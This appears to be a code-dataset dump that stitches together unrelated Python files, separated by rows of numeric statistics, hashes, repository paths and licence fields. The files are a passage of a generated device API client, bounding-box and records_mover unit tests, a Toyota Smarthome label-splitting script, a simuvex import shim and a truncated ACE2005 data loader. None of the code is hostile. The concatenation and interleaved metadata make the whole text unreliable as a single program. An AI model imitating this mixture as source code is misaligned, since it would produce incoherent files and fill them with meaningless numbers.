    # later lookups rely on these exact local names — do not rename them.
    params = locals()
    # Reject unknown keyword arguments; fold recognized ones into `params`.
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method save_device_using_post" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'device' is set
    if ('device' not in params) or (params['device'] is None):
        raise ValueError("Missing the required parameter `device` when calling `save_device_using_post`")
    collection_formats = {}
    path_params = {}
    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}
    # The Device entity is sent as the JSON request body.
    body_params = None
    if 'device' in params:
        body_params = params['device']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['*/*'])
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json'])
    # Authentication setting
    auth_settings = ['X-Authorization']
    # NOTE(review): `async` as a keyword argument is Python-2-only syntax
    # (reserved keyword since Python 3.7); this generated client targets py2.
    return self.api_client.call_api('/api/device', 'POST',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='Device',
                                    auth_settings=auth_settings,
                                    async=params.get('async'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    _preload_content=params.get('_preload_content', True),
                                    _request_timeout=params.get('_request_timeout'),
                                    collection_formats=collection_formats)
def unassign_device_from_customer_using_delete(self, device_id, **kwargs):
    """
    unassignDeviceFromCustomer

    Synchronous by default; pass async=True to receive the request thread
    instead of the deserialized result.
    >>> thread = api.unassign_device_from_customer_using_delete(device_id, async=True)
    >>> result = thread.get()
    :param async bool
    :param str device_id: deviceId (required)
    :return: Device
    If the method is called asynchronously,
    returns the request thread.
    """
    # Always request only the response data; the low-level call returns a
    # thread or the value itself depending on the 'async' flag it receives.
    kwargs['_return_http_data_only'] = True
    result = self.unassign_device_from_customer_using_delete_with_http_info(device_id, **kwargs)
    return result
def unassign_device_from_customer_using_delete_with_http_info(self, device_id, **kwargs):
    """
    unassignDeviceFromCustomer
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async=True
    >>> thread = api.unassign_device_from_customer_using_delete_with_http_info(device_id, async=True)
    >>> result = thread.get()
    :param async bool
    :param str device_id: deviceId (required)
    :return: Device
    If the method is called asynchronously,
    returns the request thread.
    """
    # Accepted call parameters: the path argument plus client-control kwargs.
    all_params = ['device_id']
    all_params.append('async')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')
    # NOTE: locals() snapshots self/device_id/kwargs AND all_params into
    # `params`; later lookups rely on these exact local names.
    params = locals()
    # Reject unknown keyword arguments; fold recognized ones into `params`.
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method unassign_device_from_customer_using_delete" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'device_id' is set
    if ('device_id' not in params) or (params['device_id'] is None):
        raise ValueError("Missing the required parameter `device_id` when calling `unassign_device_from_customer_using_delete`")
    collection_formats = {}
    path_params = {}
    if 'device_id' in params:
        path_params['deviceId'] = params['device_id']  # fills {deviceId} in the URL template
    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None  # DELETE carries no request body
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['*/*'])
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json'])
    # Authentication setting
    auth_settings = ['X-Authorization']
    # NOTE(review): `async` as a keyword argument is Python-2-only syntax
    # (reserved keyword since Python 3.7); this generated client targets py2.
    return self.api_client.call_api('/api/customer/device/{deviceId}', 'DELETE',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='Device',
                                    auth_settings=auth_settings,
                                    async=params.get('async'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    _preload_content=params.get('_preload_content', True),
                                    _request_timeout=params.get('_request_timeout'),
                                    collection_formats=collection_formats)
| 41.200459
| 149
| 0.563037
| 5,497
| 53,849
| 5.203202
| 0.035838
| 0.027411
| 0.025453
| 0.032725
| 0.958395
| 0.943745
| 0.926788
| 0.9163
| 0.902524
| 0.883749
| 0
| 0.000374
| 0.354826
| 53,849
| 1,306
| 150
| 41.232006
| 0.822894
| 0.031031
| 0
| 0.781116
| 0
| 0
| 0.169372
| 0.05254
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.008584
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
974d64013e0973492350a3982ef9edfed233eead
| 3,578
|
py
|
Python
|
base/tests/test_data_structures_bounding_boxes.py
|
mhernan88/detection-enhancer
|
c7825ea6a22633755f2b74279ab27b886fcda8e8
|
[
"Apache-2.0"
] | null | null | null |
base/tests/test_data_structures_bounding_boxes.py
|
mhernan88/detection-enhancer
|
c7825ea6a22633755f2b74279ab27b886fcda8e8
|
[
"Apache-2.0"
] | 1
|
2020-10-26T21:39:15.000Z
|
2020-10-26T21:39:15.000Z
|
base/tests/test_data_structures_bounding_boxes.py
|
mhernan88/detection-enhancer
|
c7825ea6a22633755f2b74279ab27b886fcda8e8
|
[
"Apache-2.0"
] | null | null | null |
import pytest
import numpy as np
from od_toolbelt import BoundingBoxArray
from .test_utils.setup_tests import setup_test_case, one_additional
def test_check1():
    """check() passes on a well-formed BoundingBoxArray with no extra arguments."""
    boxes, confs, lbls, _ = setup_test_case()
    arr = BoundingBoxArray(bounding_boxes=boxes, confidences=confs, labels=lbls)
    arr.check()
def test_check2():
    """check() passes when also given one extra box/confidence/label triple."""
    boxes, confs, lbls, _ = setup_test_case()
    extra_box, extra_conf, extra_lbl = one_additional()
    arr = BoundingBoxArray(bounding_boxes=boxes, confidences=confs, labels=lbls)
    arr.check(bounding_box=extra_box, confidence=extra_conf, label=extra_lbl)
def test_check3():
    """check() warns when the stored boxes have an integer dtype."""
    boxes, confs, lbls, _ = setup_test_case()
    arr = BoundingBoxArray(
        bounding_boxes=boxes.astype(np.int64), confidences=confs, labels=lbls
    )
    with pytest.warns(SyntaxWarning):
        arr.check()
def test_check4():
    """check() warns when the stored confidences have an integer dtype."""
    boxes, confs, lbls, _ = setup_test_case()
    arr = BoundingBoxArray(
        bounding_boxes=boxes, confidences=confs.astype(np.int64), labels=lbls
    )
    with pytest.warns(SyntaxWarning):
        arr.check()
def test_check5():
    """check() warns when the stored labels have a float dtype."""
    boxes, confs, lbls, _ = setup_test_case()
    arr = BoundingBoxArray(
        bounding_boxes=boxes, confidences=confs, labels=lbls.astype(np.float64)
    )
    with pytest.warns(SyntaxWarning):
        arr.check()
def test_check6():
    """check() warns when the extra box argument has an integer dtype."""
    boxes, confs, lbls, _ = setup_test_case()
    extra_box, extra_conf, extra_lbl = one_additional()
    arr = BoundingBoxArray(bounding_boxes=boxes, confidences=confs, labels=lbls)
    with pytest.warns(SyntaxWarning):
        arr.check(
            bounding_box=extra_box.astype(np.int64),
            confidence=extra_conf,
            label=extra_lbl,
        )
def test_check7():
    """check() raises when a box coordinate falls outside the [0, 1] range."""
    boxes, confs, lbls, _ = setup_test_case()
    boxes[0, 0, 0] = 1.01  # push a single coordinate out of range
    arr = BoundingBoxArray(bounding_boxes=boxes, confidences=confs, labels=lbls)
    with pytest.raises(ValueError):
        arr.check()
def test_check9():
    """check() raises when boxes carry three coordinates per point instead of two."""
    _, confs, lbls, _ = setup_test_case()
    bad_boxes = np.array(
        (
            ((0.04, 0.19, 0.12), (0.14, 0.29, 0.81)),
            ((0.11, 0.15, 0.02), (0.21, 0.25, 0.14)),
        ),
        dtype=np.float64,
    )
    arr = BoundingBoxArray(bounding_boxes=bad_boxes, confidences=confs, labels=lbls)
    with pytest.raises(ValueError):
        arr.check()
def test_append1():
    """append() grows the box collection by exactly one entry."""
    boxes, confs, lbls, _ = setup_test_case()
    n_before = boxes.shape[0]
    extra_box, extra_conf, extra_lbl = one_additional()
    arr = BoundingBoxArray(bounding_boxes=boxes, confidences=confs, labels=lbls)
    arr.append(bounding_box=extra_box, confidence=extra_conf, label=extra_lbl)
    assert arr.bounding_boxes.shape[0] == n_before + 1
| 27.736434
| 79
| 0.691448
| 410
| 3,578
| 5.812195
| 0.170732
| 0.180025
| 0.181284
| 0.109106
| 0.810743
| 0.810743
| 0.784725
| 0.784725
| 0.759127
| 0.660512
| 0
| 0.022425
| 0.202348
| 3,578
| 128
| 80
| 27.953125
| 0.812544
| 0.089156
| 0
| 0.54321
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.012346
| 1
| 0.111111
| false
| 0
| 0.049383
| 0
| 0.160494
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
978bc71d6014546f88e39ba7ec4ca6c5524f1254
| 4,073
|
py
|
Python
|
tests/unit/records/test_jobs_hints_and_parquet_records_format.py
|
cwegrzyn/records-mover
|
e3b71d6c09d99d0bcd6a956b9d09d20f8abe98d2
|
[
"Apache-2.0"
] | 36
|
2020-03-17T11:56:51.000Z
|
2022-01-19T16:03:32.000Z
|
tests/unit/records/test_jobs_hints_and_parquet_records_format.py
|
cwegrzyn/records-mover
|
e3b71d6c09d99d0bcd6a956b9d09d20f8abe98d2
|
[
"Apache-2.0"
] | 60
|
2020-03-02T23:13:29.000Z
|
2021-05-19T15:05:42.000Z
|
tests/unit/records/test_jobs_hints_and_parquet_records_format.py
|
cwegrzyn/records-mover
|
e3b71d6c09d99d0bcd6a956b9d09d20f8abe98d2
|
[
"Apache-2.0"
] | 4
|
2020-08-11T13:17:37.000Z
|
2021-11-05T21:11:52.000Z
|
import unittest
from mock import Mock, patch
from records_mover.records.job.mover import run_records_mover_job
from records_mover.records.records_format import ParquetRecordsFormat
from contextlib import contextmanager
class TestJobsHintsAndParquetRecordsFormat(unittest.TestCase):
    """Job-level tests: a config 'format': 'parquet' must produce a
    ParquetRecordsFormat, and combining it with a delimited-only hint
    ('compression') must raise NotImplementedError regardless of key order."""

    maxDiff = None  # show full diffs on assertion failures

    @patch('records_mover.records.job.mover.Session')
    def test_parquet(self, mock_Session):
        # Fake source/target objects yielded by the factory context managers.
        mock_source = Mock(name='source')
        mock_target = Mock(name='target')

        @contextmanager
        def mysource(records_format=None):
            # The job must have turned {'format': 'parquet'} into a ParquetRecordsFormat.
            self.assertIsInstance(records_format, ParquetRecordsFormat)
            yield mock_source

        @contextmanager
        def mytarget(db_engine):
            yield mock_target

        mock_job_name = Mock(name='job_name')
        # Wire our fake factories into the mocked Session's records API.
        mock_session = mock_Session.return_value
        mock_records = mock_session.records
        mock_records.sources.mysource = mysource
        mock_records.targets.mytarget = mytarget
        config = {
            'fail_if_dont_understand': False,
            'source': {
                'format': 'parquet'
            },
            'target': {
                'db_name': 'foo'
            },
        }
        out = run_records_mover_job(source_method_name='mysource',
                                    target_method_name='mytarget',
                                    job_name=mock_job_name,
                                    config=config)
        # The job should delegate to records.move and hand back its result.
        mock_records.move.assert_called()
        self.assertEqual(out, mock_records.move.return_value)

    @patch('records_mover.records.job.mover.Session')
    def test_parquet_with_delimited_hint_format_first(self, mock_Session):
        # Same wiring as test_parquet, but the config mixes a delimited-only
        # hint ('compression') with parquet — 'format' key listed first.
        mock_source = Mock(name='source')
        mock_target = Mock(name='target')

        @contextmanager
        def mysource(records_format=None):
            self.assertIsInstance(records_format, ParquetRecordsFormat)
            yield mock_source

        @contextmanager
        def mytarget(db_engine):
            yield mock_target

        mock_job_name = Mock(name='job_name')
        mock_session = mock_Session.return_value
        mock_records = mock_session.records
        mock_records.sources.mysource = mysource
        mock_records.targets.mytarget = mytarget
        config = {
            'fail_if_dont_understand': False,
            'source': {
                'format': 'parquet',
                'compression': 'GZIP',
            },
            'target': {
                'db_name': 'foo'
            },
        }
        # Delimited hints are not supported for parquet.
        with self.assertRaises(NotImplementedError):
            run_records_mover_job(source_method_name='mysource',
                                  target_method_name='mytarget',
                                  job_name=mock_job_name,
                                  config=config)

    @patch('records_mover.records.job.mover.Session')
    def test_parquet_with_delimited_hint_hint_first(self, mock_Session):
        # Same as above but with 'compression' listed before 'format', to
        # prove the rejection does not depend on dict key order.
        mock_source = Mock(name='source')
        mock_target = Mock(name='target')

        @contextmanager
        def mysource(records_format=None):
            self.assertIsInstance(records_format, ParquetRecordsFormat)
            yield mock_source

        @contextmanager
        def mytarget(db_engine):
            yield mock_target

        mock_job_name = Mock(name='job_name')
        mock_session = mock_Session.return_value
        mock_records = mock_session.records
        mock_records.sources.mysource = mysource
        mock_records.targets.mytarget = mytarget
        config = {
            'fail_if_dont_understand': False,
            'source': {
                'compression': 'GZIP',
                'format': 'parquet',
            },
            'target': {
                'db_name': 'foo'
            },
        }
        with self.assertRaises(NotImplementedError):
            run_records_mover_job(source_method_name='mysource',
                                  target_method_name='mytarget',
                                  job_name=mock_job_name,
                                  config=config)
| 35.417391
| 74
| 0.586055
| 387
| 4,073
| 5.852713
| 0.147287
| 0.058278
| 0.043709
| 0.038852
| 0.848565
| 0.836645
| 0.824283
| 0.824283
| 0.824283
| 0.824283
| 0
| 0
| 0.332433
| 4,073
| 114
| 75
| 35.72807
| 0.833027
| 0
| 0
| 0.77
| 0
| 0
| 0.105328
| 0.045667
| 0
| 0
| 0
| 0
| 0.07
| 1
| 0.09
| false
| 0
| 0.05
| 0
| 0.16
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
979a4d35d0ab6245974c294bb86d6d0272814287
| 7,745
|
py
|
Python
|
Data/labeler.py
|
cocoalowonou/ToyotaSmartHome
|
dcde13adcf00ba071be6f44e45fe8da1ba43b269
|
[
"Apache-2.0"
] | 1
|
2021-04-24T02:32:38.000Z
|
2021-04-24T02:32:38.000Z
|
Data/labeler.py
|
cocoalowonou/ToyotaSmartHome
|
dcde13adcf00ba071be6f44e45fe8da1ba43b269
|
[
"Apache-2.0"
] | 1
|
2021-01-29T11:28:06.000Z
|
2021-01-29T11:28:06.000Z
|
Data/labeler.py
|
cocoalowonou/ToyotaSmartHome
|
dcde13adcf00ba071be6f44e45fe8da1ba43b269
|
[
"Apache-2.0"
] | 1
|
2021-01-26T09:40:29.000Z
|
2021-01-26T09:40:29.000Z
|
import os
from glob import glob
from sklearn.model_selection import train_test_split
# ======================================================================================================
# data structure
# ======================================================================================================
# cross-subject(subject id) => train: 3, 4, 6, 7, 9, 12, 13, 15, 17, 19, 25 | test: remaining 7 subjects
# cross-view1(camera id) => train: 1 | validation: 5 | test: 2
# cross-view2(camera id) => train: 1, 3, 4, 6, 7 | validation: 5 | test: 2
#
# csv header => sub directory file path, index, category
# official site: https://project.inria.fr/toyotasmarthome/
#
# *files root path means is bellow
# ex)
# json (files_root_path)
# L xxx.json
# L xxx.json
# .
# .
# .
# ======================================================================================================
def cross_subject(files_root_path: str, save_path: str):
    """Write train/test label CSVs using the cross-subject protocol.

    Subjects 3, 4, 6, 7, 9, 12, 13, 15, 17, 19 and 25 go to train; every
    other subject goes to test. Rows are "<filename>,<category idx>,<category>".
    """
    # make sure the output directory exists
    if not os.path.exists(save_path):
        os.makedirs(save_path)
    # enumerate the dataset files under the toyotasmarthome root
    dataset_files = glob(os.path.join(files_root_path, "*"))
    train_rows = []
    test_rows = []
    categories = []
    train_subjects = [3, 4, 6, 7, 9, 12, 13, 15, 17, 19, 25]
    for dataset_file in dataset_files:
        # filename layout: Activityname_p[id]_r[XX]_[XX]_c[0-7]
        name = dataset_file.split("/")[-1]
        parts = name.split("_")
        activity = parts[0]
        subject = int(parts[1][1:])
        # first-seen order defines the category index
        if activity not in categories:
            categories.append(activity)
        row = "{},{},{}".format(name, categories.index(activity), activity)
        if subject in train_subjects:
            train_rows.append(row)
        else:
            test_rows.append(row)
    print(f"[cross subject] train: {len(train_rows)}, test: {len(test_rows)}, categories: {len(categories)}")
    with open(os.path.join(save_path, "train.csv"), "w") as f:
        f.writelines("\n".join(train_rows))
    with open(os.path.join(save_path, "test.csv"), "w") as f:
        f.writelines("\n".join(test_rows))
def cross_view1(files_root_path: str, save_path: str):
    """Write train/val/test label CSVs using the cross-view-1 protocol.

    Camera 1 -> train, camera 5 -> validation, camera 2 -> test; files from
    every other camera are ignored entirely.
    """
    # make sure the output directory exists
    if not os.path.exists(save_path):
        os.makedirs(save_path)
    # enumerate the dataset files under the toyotasmarthome root
    dataset_files = glob(os.path.join(files_root_path, "*"))
    train_rows = []
    val_rows = []
    test_rows = []
    categories = []
    for dataset_file in dataset_files:
        # filename layout: Activityname_p[id]_r[XX]_[XX]_c[0-7]
        name = dataset_file.split("/")[-1]
        parts = name.split("_")
        activity = parts[0]
        camera = int(parts[4][1:])
        if camera in [1, 2, 5]:
            # first-seen order defines the category index
            if activity not in categories:
                categories.append(activity)
            row = "{},{},{}".format(name, categories.index(activity), activity)
            if camera == 1:
                train_rows.append(row)
            elif camera == 5:
                val_rows.append(row)
            elif camera == 2:
                test_rows.append(row)
    print(f"[cross view 1] train: {len(train_rows)}, test: {len(test_rows)}, val: {len(val_rows)}, categories: {len(categories)}")
    with open(os.path.join(save_path, "train.csv"), "w") as f:
        f.writelines("\n".join(train_rows))
    with open(os.path.join(save_path, "val.csv"), "w") as f:
        f.writelines("\n".join(val_rows))
    with open(os.path.join(save_path, "test.csv"), "w") as f:
        f.writelines("\n".join(test_rows))
def cross_view2(files_root_path: str, save_path: str):
    """Write train/val/test label CSVs using the cross-view-2 protocol.

    Cameras 1, 3, 4, 6, 7 -> train, camera 5 -> validation, camera 2 -> test.
    Rows are "<filename>,<category index>,<category name>".
    """
    # path check
    if not os.path.exists(save_path):
        os.makedirs(save_path)
    # read a files path (root path of the toyotasmarthome files)
    files_path = glob(os.path.join(files_root_path, "*"))
    trains = []
    vals = []
    tests = []
    activitynames = []
    for file_path in files_path:
        filename = file_path.split("/")[-1]
        # filename layout: Activityname_p[id]_r[XX]_[XX]_c[0-7]
        splited_filename = filename.split("_")
        activityname = splited_filename[0]
        camera_id = int(splited_filename[4][1:])
        if camera_id in [1, 2, 3, 4, 5, 6, 7]:
            # first-seen order defines the category index
            if activityname not in activitynames:
                activitynames.append(activityname)
            label = "{},{},{}".format(filename, activitynames.index(activityname), activityname)
            if camera_id in [1, 3, 4, 6, 7]:
                trains.append(label)
            if camera_id == 5:
                vals.append(label)
            if camera_id == 2:
                tests.append(label)
    # BUGFIX: summary previously said "[cross view 1]" (copy-paste from cross_view1).
    print(f"[cross view 2] train: {len(trains)}, test: {len(tests)}, val: {len(vals)}, categories: {len(activitynames)}")
    # save
    with open(os.path.join(save_path, "train.csv"), "w") as f:
        f.writelines("\n".join(trains))
    with open(os.path.join(save_path, "val.csv"), "w") as f:
        f.writelines("\n".join(vals))
    with open(os.path.join(save_path, "test.csv"), "w") as f:
        f.writelines("\n".join(tests))
def custom_split(files_root_path: str, save_path: str, shuffle: bool, test_size: float):
    """Write train/test label CSVs from a random (optionally shuffled) split.

    Delegates the split itself to sklearn's train_test_split; `test_size`
    is the test fraction and `shuffle` controls row shuffling.
    """
    # make sure the output directory exists
    if not os.path.exists(save_path):
        os.makedirs(save_path)
    # enumerate the dataset files under the toyotasmarthome root
    dataset_files = glob(os.path.join(files_root_path, "*"))
    rows = []
    row_indices = []
    categories = []
    for dataset_file in dataset_files:
        # filename layout: Activityname_p[id]_r[XX]_[XX]_c[0-7]
        name = dataset_file.split("/")[-1]
        activity = name.split("_")[0]
        # first-seen order defines the category index
        if activity not in categories:
            categories.append(activity)
        index = categories.index(activity)
        rows.append("{},{},{}".format(name, index, activity))
        row_indices.append(index)
    trains, tests, _, _ = train_test_split(rows, row_indices, shuffle=shuffle, test_size=test_size)
    print(f"[custom split] train: {len(trains)}, test: {len(tests)}, categories: {len(categories)}, test size: {test_size}")
    with open(os.path.join(save_path, "train.csv"), "w") as f:
        f.writelines("\n".join(trains))
    with open(os.path.join(save_path, "test.csv"), "w") as f:
        f.writelines("\n".join(tests))
#=========================================
# run labeler
#=========================================
# Build label CSVs from the RGB frame files; the same splits can be reused
# for the "depth" or "skeleton" modalities of the dataset.
cross_subject(files_root_path = "./mp4_frames/", save_path = "./Labels/cross_subject/")
cross_view1(files_root_path = "./mp4_frames/", save_path = "./Labels/cross_view1/")
cross_view2(files_root_path = "./mp4_frames/", save_path = "./Labels/cross_view2/")
custom_split(files_root_path = "./mp4_frames/", save_path = "./Labels/custom_split_7_3/", shuffle=True, test_size=0.3)
| 35.856481
| 127
| 0.572111
| 968
| 7,745
| 4.42562
| 0.136364
| 0.048553
| 0.042484
| 0.03268
| 0.801821
| 0.781279
| 0.771475
| 0.765173
| 0.756769
| 0.709851
| 0
| 0.017958
| 0.245061
| 7,745
| 216
| 128
| 35.856481
| 0.714726
| 0.240155
| 0
| 0.740385
| 0
| 0.038462
| 0.122982
| 0.019237
| 0
| 0
| 0
| 0
| 0
| 1
| 0.038462
| false
| 0
| 0.028846
| 0
| 0.067308
| 0.038462
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c139735ef3c08ed36a2e3ae40c32f13060eda8ea
| 136
|
py
|
Python
|
simuvex/simuvex/concretization_strategies/nonzero_range.py
|
Ruide/angr-dev
|
964dc80c758e25c698c2cbcc454ef5954c5fa0a0
|
[
"BSD-2-Clause"
] | 86
|
2015-08-06T23:25:07.000Z
|
2022-02-17T14:58:22.000Z
|
simuvex/simuvex/concretization_strategies/nonzero_range.py
|
Ruide/angr-dev
|
964dc80c758e25c698c2cbcc454ef5954c5fa0a0
|
[
"BSD-2-Clause"
] | 132
|
2015-09-10T19:06:59.000Z
|
2018-10-04T20:36:45.000Z
|
simuvex/simuvex/concretization_strategies/nonzero_range.py
|
Ruide/angr-dev
|
964dc80c758e25c698c2cbcc454ef5954c5fa0a0
|
[
"BSD-2-Clause"
] | 80
|
2015-08-07T10:30:20.000Z
|
2020-03-21T14:45:28.000Z
|
# Compatibility shim: the concretization strategies moved into angr; re-export
# them so old `simuvex.concretization_strategies.nonzero_range` imports keep working.
# BUGFIX: use the function-call form of print — the bare py2 print statement is a
# SyntaxError on Python 3; with a single parenthesized argument the output is
# identical on Python 2.
print('... Importing simuvex/concretization_strategies/nonzero_range.py ...')
from angr.concretization_strategies.nonzero_range import *
| 45.333333
| 76
| 0.830882
| 15
| 136
| 7.266667
| 0.733333
| 0.440367
| 0.568807
| 0.66055
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.066176
| 136
| 2
| 77
| 68
| 0.858268
| 0
| 0
| 0
| 0
| 0
| 0.5
| 0.367647
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 1
| null | null | 0.5
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 1
|
0
| 8
|
c148aefe419cae2ac13e70ddb78d033beba8987f
| 28,485
|
py
|
Python
|
data_load.py
|
Ronzey/Module-based-few-shot-event-extraction
|
b2319f6cfb682920fffd867736f9e02246e2142c
|
[
"MIT"
] | 1
|
2021-02-13T13:18:00.000Z
|
2021-02-13T13:18:00.000Z
|
data_load.py
|
Ronzey/Module-based-few-shot-event-extraction
|
b2319f6cfb682920fffd867736f9e02246e2142c
|
[
"MIT"
] | null | null | null |
data_load.py
|
Ronzey/Module-based-few-shot-event-extraction
|
b2319f6cfb682920fffd867736f9e02246e2142c
|
[
"MIT"
] | 3
|
2020-10-20T15:51:53.000Z
|
2021-09-30T08:35:34.000Z
|
import numpy as np
import torch
from torch.utils import data
import json
import copy
from consts import NONE, PAD, CLS, SEP, UNK, TRIGGERS, ARGUMENTS, ENTITIES, POSTAGS, SRL_ARGUMENTS
from utils import build_vocab, srl_find_trigger, srl_find_argument, srl_split_role
from pytorch_pretrained_bert import BertTokenizer
# init vocab
# Build label<->index vocabularies for each tag set. BIO_tagging=False is
# passed for the sets used without B-/I- expansion — presumably build_vocab
# otherwise prefixes labels with B-/I-; confirm in utils.build_vocab.
all_triggers, trigger2idx, idx2trigger = build_vocab(TRIGGERS)
all_entities, entity2idx, idx2entity = build_vocab(ENTITIES)
all_postags, postag2idx, idx2postag = build_vocab(POSTAGS, BIO_tagging=False)
all_srl, srl2idx, idx2srl = build_vocab(SRL_ARGUMENTS, BIO_tagging=False)
all_triggers_noBIO, trigger2idx_noBIO, idx2trigger_noBIO = build_vocab(TRIGGERS, BIO_tagging=False)
#all_arguments, argument2idx, idx2argument = build_vocab(ARGUMENTS, BIO_tagging=False)
# Cased BERT tokenizer; never_split protects the special marker tokens.
tokenizer = BertTokenizer.from_pretrained('bert-base-cased', do_lower_case=False, never_split=(PAD, CLS, SEP, UNK))
class ACE2005Dataset(data.Dataset):
    """ACE2005 event-extraction dataset: sentences with entity/POS/trigger/
    argument annotations plus SRL (semantic role labeling) tags."""

    def __init__(self, fpath, all_arguments, argument2idx, fpath_mix=None, indices=None):
        """Load one (or, with fpath_mix, two) ACE2005-style JSON files.

        :param fpath: path to the main JSON data file
        :param all_arguments: argument-role vocabulary (roles outside it are dropped)
        :param argument2idx: role name -> index mapping
        :param fpath_mix: optional second JSON file whose items are appended
        :param indices: optional list of item indices; when given, keep only those items
        """
        self.sent_li, self.entities_li, self.postags_li, self.triggers_li, self.arguments_li, self.srl_arguments_li, self.srl_triggers_li = [], [], [], [], [], [], []
        if fpath_mix:
            fpath_list = [fpath, fpath_mix]
        else:
            fpath_list = [fpath]
        for _fpath in fpath_list:
            with open(_fpath, 'r') as f:
                data = json.load(f)
                for item in data:
                    words = item['words']
                    # per-token entity tags (a token may carry several) and trigger tags
                    entities = [[NONE] for _ in range(len(words))]
                    triggers = [NONE] * len(words)
                    postags = item['pos-tags']
                    arguments = {
                        'candidates': [
                            # ex. (5, 6, "entity_type_str"), ...
                        ],
                        'events': {
                            # ex. (1, 3, "trigger_type_str"): [(5, 6, "argument_role_idx"), ...]
                        },
                    }
                    srl_arguments = {
                        'candidates': [
                            # ex. (5, 6, "entity_type_str"), ...
                        ],
                        'events': {
                            # ex. (1, 3, "trigger_type_str"): [(5, 6, "argument_role_idx"), ...]
                        },
                    }
                    srl_triggers_single_seq = []  # ex. [[verb1_srl_tag1, ..., verb1_srl_tagn],[verb2_srl_tag1, ..., verb2_srl_tagn],...]
                    # gold entity mentions -> BIO entity tags + argument candidates
                    for entity_mention in item['golden-entity-mentions']:
                        arguments['candidates'].append((entity_mention['start'], entity_mention['end'], entity_mention['entity-type']))
                        for i in range(entity_mention['start'], entity_mention['end']):
                            entity_type = entity_mention['entity-type']
                            if i == entity_mention['start']:
                                entity_type = 'B-{}'.format(entity_type)
                            else:
                                entity_type = 'I-{}'.format(entity_type)
                            if len(entities[i]) == 1 and entities[i][0] == NONE:
                                entities[i][0] = entity_type
                            else:
                                entities[i].append(entity_type)
                    # gold event mentions -> BIO trigger tags + per-event argument lists
                    for event_mention in item['golden-event-mentions']:
                        for i in range(event_mention['trigger']['start'], event_mention['trigger']['end']):
                            trigger_type = event_mention['event_type']
                            if i == event_mention['trigger']['start']:
                                triggers[i] = 'B-{}'.format(trigger_type)
                            else:
                                triggers[i] = 'I-{}'.format(trigger_type)
                        event_key = (event_mention['trigger']['start'], event_mention['trigger']['end'], event_mention['event_type'])
                        arguments['events'][event_key] = []
                        for argument in event_mention['arguments']:
                            role = argument['role']
                            # collapse Time-* sub-roles (e.g. "Time-Within") into plain "Time"
                            if role.startswith('Time'):
                                role = role.split('-')[0]
                            if role in all_arguments:
                                arguments['events'][event_key].append((argument['start'], argument['end'], argument2idx[role]))
                    # SRL predictions -> pseudo events keyed by predicate span
                    for srl_item in item['srl']:
                        srl_trigger_start, srl_trigger_end = srl_find_trigger(srl_item['tags'])
                        if srl_trigger_start != None:
                            event_key = (srl_trigger_start, srl_trigger_end, srl_item['verb'])
                            argument_list = srl_find_argument(srl_item['tags'])
                            srl_arguments['events'][event_key] = []
                            for argument in argument_list:
                                srl_arguments['events'][event_key].append(argument)
                    # per-predicate SRL tag sequences for the whole sentence
                    for srl_item in item['srl']:
                        srl_triggers = []
                        for tag in srl_item['tags']:
                            # split the BI tag and the CR middle tag
                            tag = srl_split_role(tag)
                            srl_triggers.append(tag)
                        srl_triggers_single_seq.append(srl_triggers)
                    if srl_triggers_single_seq==[]:
                        srl_triggers_single_seq=[[]]  # reshape
                    # wrap the token sequence in the BERT marker tokens
                    self.sent_li.append([CLS] + words + [SEP])
